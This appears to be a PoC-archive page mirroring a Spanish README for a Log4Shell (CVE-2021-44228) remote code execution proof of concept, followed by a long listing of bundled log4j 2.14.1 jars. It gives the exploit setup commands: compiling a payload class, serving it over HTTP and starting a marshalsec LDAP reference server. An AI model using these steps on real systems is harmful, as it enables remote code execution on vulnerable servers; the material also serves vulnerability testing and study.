关联漏洞
描述
PoC RCE Log4j CVE-2021-4428 para pruebas
介绍
# Apache Log4j CVE-2021-44228 GK7 PoC
## Pasos
1. Compilar Log4jRCE.java y mover el archivo .class a un servidor web (ej: PHP local)
1. `cd src/main/java`
2. `javac Log4jRCE.java`
3. Mover archivo .class a server web o iniciar localmente un php, por ejempl : `php -S 127.0.0.1:8888`
2. Iniciar LDAP Server
1. `git clone git@github.com:Grupo-Kapa-7/marshalsec.git`
2. `cd marshalsec`
3. `mvn clean package -DskipTests`
4. start ldap server `java -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"`
3. Para proabr la PoC, modificar el archivo src/main/java/log4j.java y cambiar el URL del servidor LDAP a su gusto.
### Repo Original
[https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)
文件快照
[4.0K] /data/pocs/10807c2d27e462c47fa0d389222a969c421c3039
├── [1.2K] pom.xml
├── [ 861] README.md
├── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ ├── [4.0K] apache-log4j-2.14.1-bin
│ │ ├── [365K] jackson-core-2.13.0-rc1.jar
│ │ ├── [ 11K] LICENSE.txt
│ │ ├── [202K] log4j-1.2-api-2.14.1.jar
│ │ ├── [687K] log4j-1.2-api-2.14.1-javadoc.jar
│ │ ├── [164K] log4j-1.2-api-2.14.1-sources.jar
│ │ ├── [293K] log4j-api-2.14.1.jar
│ │ ├── [1016K] log4j-api-2.14.1-javadoc.jar
│ │ ├── [259K] log4j-api-2.14.1-sources.jar
│ │ ├── [ 15K] log4j-appserver-2.14.1.jar
│ │ ├── [ 45K] log4j-appserver-2.14.1-javadoc.jar
│ │ ├── [ 15K] log4j-appserver-2.14.1-sources.jar
│ │ ├── [ 22K] log4j-cassandra-2.14.1.jar
│ │ ├── [ 50K] log4j-cassandra-2.14.1-javadoc.jar
│ │ ├── [ 15K] log4j-cassandra-2.14.1-sources.jar
│ │ ├── [1.7M] log4j-core-2.14.1.jar
│ │ ├── [5.1M] log4j-core-2.14.1-javadoc.jar
│ │ ├── [1.2M] log4j-core-2.14.1-sources.jar
│ │ ├── [1.6M] log4j-core-2.14.1-tests.jar
│ │ ├── [ 15K] log4j-couchdb-2.14.1.jar
│ │ ├── [ 37K] log4j-couchdb-2.14.1-javadoc.jar
│ │ ├── [ 13K] log4j-couchdb-2.14.1-sources.jar
│ │ ├── [ 22K] log4j-docker-2.14.1.jar
│ │ ├── [422K] log4j-docker-2.14.1-javadoc.jar
│ │ ├── [ 18K] log4j-docker-2.14.1-sources.jar
│ │ ├── [ 60K] log4j-flume-ng-2.14.1.jar
│ │ ├── [ 95K] log4j-flume-ng-2.14.1-javadoc.jar
│ │ ├── [ 36K] log4j-flume-ng-2.14.1-sources.jar
│ │ ├── [ 48K] log4j-iostreams-2.14.1.jar
│ │ ├── [178K] log4j-iostreams-2.14.1-javadoc.jar
│ │ ├── [ 42K] log4j-iostreams-2.14.1-sources.jar
│ │ ├── [ 12K] log4j-jcl-2.14.1.jar
│ │ ├── [ 42K] log4j-jcl-2.14.1-javadoc.jar
│ │ ├── [ 13K] log4j-jcl-2.14.1-sources.jar
│ │ ├── [ 21K] log4j-jdbc-dbcp2-2.14.1.jar
│ │ ├── [ 54K] log4j-jdbc-dbcp2-2.14.1-javadoc.jar
│ │ ├── [ 14K] log4j-jdbc-dbcp2-2.14.1-sources.jar
│ │ ├── [ 26K] log4j-jmx-gui-2.14.1.jar
│ │ ├── [ 60K] log4j-jmx-gui-2.14.1-javadoc.jar
│ │ ├── [ 19K] log4j-jmx-gui-2.14.1-sources.jar
│ │ ├── [ 43K] log4j-jpa-2.14.1.jar
│ │ ├── [130K] log4j-jpa-2.14.1-javadoc.jar
│ │ ├── [ 37K] log4j-jpa-2.14.1-sources.jar
│ │ ├── [ 26K] log4j-jul-2.14.1.jar
│ │ ├── [ 88K] log4j-jul-2.14.1-javadoc.jar
│ │ ├── [ 24K] log4j-jul-2.14.1-sources.jar
│ │ ├── [ 10K] log4j-liquibase-2.14.1.jar
│ │ ├── [ 30K] log4j-liquibase-2.14.1-javadoc.jar
│ │ ├── [9.8K] log4j-liquibase-2.14.1-sources.jar
│ │ ├── [ 21K] log4j-mongodb3-2.14.1.jar
│ │ ├── [ 53K] log4j-mongodb3-2.14.1-javadoc.jar
│ │ ├── [ 16K] log4j-mongodb3-2.14.1-sources.jar
│ │ ├── [ 19K] log4j-mongodb4-2.14.1.jar
│ │ ├── [ 53K] log4j-mongodb4-2.14.1-javadoc.jar
│ │ ├── [ 15K] log4j-mongodb4-2.14.1-sources.jar
│ │ ├── [ 20K] log4j-slf4j18-impl-2.14.1.jar
│ │ ├── [ 62K] log4j-slf4j18-impl-2.14.1-javadoc.jar
│ │ ├── [ 19K] log4j-slf4j18-impl-2.14.1-sources.jar
│ │ ├── [ 23K] log4j-slf4j-impl-2.14.1.jar
│ │ ├── [ 89K] log4j-slf4j-impl-2.14.1-javadoc.jar
│ │ ├── [ 23K] log4j-slf4j-impl-2.14.1-sources.jar
│ │ ├── [ 20K] log4j-spring-boot-2.14.1.jar
│ │ ├── [388K] log4j-spring-boot-2.14.1-javadoc.jar
│ │ ├── [ 17K] log4j-spring-boot-2.14.1-sources.jar
│ │ ├── [ 15K] log4j-spring-cloud-config-client-2.14.1.jar
│ │ ├── [377K] log4j-spring-cloud-config-client-2.14.1-javadoc.jar
│ │ ├── [ 14K] log4j-spring-cloud-config-client-2.14.1-sources.jar
│ │ ├── [ 32K] log4j-taglib-2.14.1.jar
│ │ ├── [ 97K] log4j-taglib-2.14.1-javadoc.jar
│ │ ├── [ 33K] log4j-taglib-2.14.1-sources.jar
│ │ ├── [ 35K] log4j-web-2.14.1.jar
│ │ ├── [ 88K] log4j-web-2.14.1-javadoc.jar
│ │ ├── [ 30K] log4j-web-2.14.1-sources.jar
│ │ ├── [ 413] NOTICE.txt
│ │ ├── [ 12K] RELEASE-NOTES.md
│ │ ├── [ 41K] slf4j-api-1.7.32.jar
│ │ └── [ 12K] slf4j-log4j12-1.7.32.jar
│ ├── [ 394] log4j.java
│ ├── [ 423] Log4jRCE.class
│ └── [ 378] Log4jRCE.java
└── [4.0K] target
└── [4.0K] classes
├── [4.0K] apache-log4j-2.14.1-bin
│ ├── [365K] jackson-core-2.13.0-rc1.jar
│ ├── [ 11K] LICENSE.txt
│ ├── [202K] log4j-1.2-api-2.14.1.jar
│ ├── [687K] log4j-1.2-api-2.14.1-javadoc.jar
│ ├── [164K] log4j-1.2-api-2.14.1-sources.jar
│ ├── [293K] log4j-api-2.14.1.jar
│ ├── [1016K] log4j-api-2.14.1-javadoc.jar
│ ├── [259K] log4j-api-2.14.1-sources.jar
│ ├── [ 15K] log4j-appserver-2.14.1.jar
│ ├── [ 45K] log4j-appserver-2.14.1-javadoc.jar
│ ├── [ 15K] log4j-appserver-2.14.1-sources.jar
│ ├── [ 22K] log4j-cassandra-2.14.1.jar
│ ├── [ 50K] log4j-cassandra-2.14.1-javadoc.jar
│ ├── [ 15K] log4j-cassandra-2.14.1-sources.jar
│ ├── [1.7M] log4j-core-2.14.1.jar
│ ├── [5.1M] log4j-core-2.14.1-javadoc.jar
│ ├── [1.2M] log4j-core-2.14.1-sources.jar
│ ├── [1.6M] log4j-core-2.14.1-tests.jar
│ ├── [ 15K] log4j-couchdb-2.14.1.jar
│ ├── [ 37K] log4j-couchdb-2.14.1-javadoc.jar
│ ├── [ 13K] log4j-couchdb-2.14.1-sources.jar
│ ├── [ 22K] log4j-docker-2.14.1.jar
│ ├── [422K] log4j-docker-2.14.1-javadoc.jar
│ ├── [ 18K] log4j-docker-2.14.1-sources.jar
│ ├── [ 60K] log4j-flume-ng-2.14.1.jar
│ ├── [ 95K] log4j-flume-ng-2.14.1-javadoc.jar
│ ├── [ 36K] log4j-flume-ng-2.14.1-sources.jar
│ ├── [ 48K] log4j-iostreams-2.14.1.jar
│ ├── [178K] log4j-iostreams-2.14.1-javadoc.jar
│ ├── [ 42K] log4j-iostreams-2.14.1-sources.jar
│ ├── [ 12K] log4j-jcl-2.14.1.jar
│ ├── [ 42K] log4j-jcl-2.14.1-javadoc.jar
│ ├── [ 13K] log4j-jcl-2.14.1-sources.jar
│ ├── [ 21K] log4j-jdbc-dbcp2-2.14.1.jar
│ ├── [ 54K] log4j-jdbc-dbcp2-2.14.1-javadoc.jar
│ ├── [ 14K] log4j-jdbc-dbcp2-2.14.1-sources.jar
│ ├── [ 26K] log4j-jmx-gui-2.14.1.jar
│ ├── [ 60K] log4j-jmx-gui-2.14.1-javadoc.jar
│ ├── [ 19K] log4j-jmx-gui-2.14.1-sources.jar
│ ├── [ 43K] log4j-jpa-2.14.1.jar
│ ├── [130K] log4j-jpa-2.14.1-javadoc.jar
│ ├── [ 37K] log4j-jpa-2.14.1-sources.jar
│ ├── [ 26K] log4j-jul-2.14.1.jar
│ ├── [ 88K] log4j-jul-2.14.1-javadoc.jar
│ ├── [ 24K] log4j-jul-2.14.1-sources.jar
│ ├── [ 10K] log4j-liquibase-2.14.1.jar
│ ├── [ 30K] log4j-liquibase-2.14.1-javadoc.jar
│ ├── [9.8K] log4j-liquibase-2.14.1-sources.jar
│ ├── [ 21K] log4j-mongodb3-2.14.1.jar
│ ├── [ 53K] log4j-mongodb3-2.14.1-javadoc.jar
│ ├── [ 16K] log4j-mongodb3-2.14.1-sources.jar
│ ├── [ 19K] log4j-mongodb4-2.14.1.jar
│ ├── [ 53K] log4j-mongodb4-2.14.1-javadoc.jar
│ ├── [ 15K] log4j-mongodb4-2.14.1-sources.jar
│ ├── [ 20K] log4j-slf4j18-impl-2.14.1.jar
│ ├── [ 62K] log4j-slf4j18-impl-2.14.1-javadoc.jar
│ ├── [ 19K] log4j-slf4j18-impl-2.14.1-sources.jar
│ ├── [ 23K] log4j-slf4j-impl-2.14.1.jar
│ ├── [ 89K] log4j-slf4j-impl-2.14.1-javadoc.jar
│ ├── [ 23K] log4j-slf4j-impl-2.14.1-sources.jar
│ ├── [ 20K] log4j-spring-boot-2.14.1.jar
│ ├── [388K] log4j-spring-boot-2.14.1-javadoc.jar
│ ├── [ 17K] log4j-spring-boot-2.14.1-sources.jar
│ ├── [ 15K] log4j-spring-cloud-config-client-2.14.1.jar
│ ├── [377K] log4j-spring-cloud-config-client-2.14.1-javadoc.jar
│ ├── [ 14K] log4j-spring-cloud-config-client-2.14.1-sources.jar
│ ├── [ 32K] log4j-taglib-2.14.1.jar
│ ├── [ 97K] log4j-taglib-2.14.1-javadoc.jar
│ ├── [ 33K] log4j-taglib-2.14.1-sources.jar
│ ├── [ 35K] log4j-web-2.14.1.jar
│ ├── [ 88K] log4j-web-2.14.1-javadoc.jar
│ ├── [ 30K] log4j-web-2.14.1-sources.jar
│ ├── [ 413] NOTICE.txt
│ ├── [ 12K] RELEASE-NOTES.md
│ ├── [ 41K] slf4j-api-1.7.32.jar
│ └── [ 12K] slf4j-log4j12-1.7.32.jar
├── [ 928] log4j.class
└── [ 490] Log4jRCE.class
7 directories, 159 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。